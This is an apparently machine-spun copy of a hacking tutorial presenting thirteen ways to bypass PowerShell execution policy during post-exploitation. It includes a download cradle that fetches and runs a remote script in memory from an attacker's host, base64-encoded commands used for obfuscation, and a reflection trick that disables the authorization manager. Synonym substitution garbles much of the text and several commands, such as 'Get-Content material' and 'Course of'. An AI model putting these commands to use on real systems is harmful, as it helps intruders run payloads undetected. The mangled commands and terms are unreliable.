PowerShell is an integral part of any Home windows setting and generally is a highly effective software within the palms of a hacker. Throughout post-exploitation, PowerShell scripts could make privilege escalation and pivoting a breeze, however its execution coverage can put a damper on even the best-laid plans. There are a selection of strategies, nonetheless, that can be utilized to bypass PowerShell execution coverage.

PowerShell Execution Coverage Overview

The aim of PowerShell’s execution coverage is to regulate how configuration information are loaded and the way scripts are run. It is a security characteristic that helps forestall malicious scripts from being executed. Insurance policies may be set on the pc degree, person degree, and session degree on Home windows machines. It is vital to notice that the execution coverage is just not meant to be safe — it merely prevents customers from unintentionally inflicting harm. As we’ll quickly discover out, it may be bypassed in a number of methods.

There are seven varieties of execution insurance policies in PowerShell. These are solely enforced on Home windows machines:

  • Unrestricted: That is the default coverage for non-Home windows machines; it means scripts might be run with a warning.
  • Restricted: That is the default for Home windows machines; it prevents scripts from being run however permits particular person instructions.
  • Bypass: This implies all scripts can run and there are not any warnings.
  • AllSigned: This requires all scripts and configuration information to be signed by a trusted writer — even these created on the native machine.
  • RemoteSigned: That is the default coverage on Home windows servers; requires a signature solely from information downloaded from the web.
  • Default: This merely units the default execution coverage.
  • Undefined: That is when there isn’t a coverage set within the present scope. If all scopes are Undefined, the execution coverage defaults to Restricted.

To view the present execution coverage, concern the next command in PowerShell:


Now that we have coated the fundamentals, let’s get began on some bypasses.

Methodology 1: Bypass Flag

Maybe the best technique to bypass execution coverage is to make use of the Bypass flag. Doing so will run the script with no warnings or prompts.

PowerShell.exe -ExecutionPolicy Bypass -File .script.ps1

Methodology 2: Unrestricted Flag

Much like the Bypass flag, we will use the Unrestricted flag to run our script, this time with a warning.

PowerShell.exe -ExecutionPolicy Unrestricted -File .script.ps1

Methodology 3: Command Swap

We will use the command swap to concern instructions and instantly run a script. It will work for easy scripts, however extra complicated ones will often have errors.

PowerShell -command "Write-Host 'It is a check.'"

Or the quick model:

PowerShell -c "Write-Host 'It is a check.'"

Methodology 4: Encoded Command Swap

This technique is just like the command swap however encodes the script as a base64 encoded string. This may help keep away from parsing errors in addition to present a layer of obfuscation.

$command = "Write-Host 'It is a check.'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand

Methodology 5: Invoke-Command

The Invoke-Command technique is good in that it may be used to concern instructions in opposition to distant machines when PowerShell remoting has been enabled.

invoke-command -scriptblock {Write-Host "It is a check."}

Methodology 6: Invoke-Expression

We will use the Invoke-Expression technique to pipe the contents of our script and be executed.

Get-Content material .script.ps1 | Invoke-Expression

Or the quick model:

GC .script.ps1 | iex

Methodology 7: Obtain from URL

PowerShell can be utilized to obtain a script from the web, or from an attacker’s machine, after which be executed with out writing to disk.

PowerShell -nop -c "iex(New-Object Internet.WebClient).DownloadString('http://instance.com/script.ps1')"

Methodology 8: Paste

One other technique to get round execution coverage is to easily copy and paste the script into the interactive console. Once more, that is helpful for working fast scripts that are not too complicated.

Write-Host "It is a check."

Methodology 9: Echo & Pipe

We will additionally echo the contents of our script into PowerShell customary enter.

Echo Write-Host "It is a check." | PowerShell -noprofile -

Methodology 10: Learn & Pipe

Much like the echo technique, we will learn the contents of our script and pipe it into PowerShell customary enter.

Get-Content material .script.ps1 | PowerShell -noprofile -

Or utilizing the Home windows kind command:

kind .script.ps1 | PowerShell -noprofile -

Methodology 11: Course of Scope

The execution coverage may be utilized at totally different ranges, together with the at the moment managed course of. We will change the execution coverage for the present course of.

Set-ExecutionPolicy Bypass -Scope Course of

Methodology 12: Present Consumer Scope

This technique is just like the method scope however adjustments the execution coverage for the present person. This works by modifying a registry key beneath the hood.

Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted

Methodology 13: Authorization Supervisor Swap

The ultimate technique we’ll cowl primarily overrides a perform in PowerShell. The AuthorizationManager perform might be changed with a null worth when our perform is known as, setting the execution coverage for the session to Unrestricted, and permitting our script to run.

perform Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_context","nonpublic,occasion").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,occasion").setvalue($ctx, (new-object System.Administration.Automation.AuthorizationManager "Microsoft.PowerShell"))} Disable-ExecutionPolicy .script.ps1

PowerShell Is an Important Software for Any Hacker

On this article, we realized about PowerShell’s execution coverage, the modes it has, and the variations between them. We then explored quite a lot of strategies to bypass execution coverage to run scripts. PowerShell is a necessary software for any hacker, particularly throughout post-exploitation, and the flexibility to execute scripts unrestricted makes issues an entire lot simpler.

Need to begin earning money as a white hat hacker? Leap-start your white-hat hacking profession with our 2020 Premium Moral Hacking Certification Coaching Bundle from the brand new Null Byte Store and recover from 60 hours of coaching from moral hacking professionals.

Purchase Now (90% off) >

Cowl picture by XXSS IS BACK/Pexels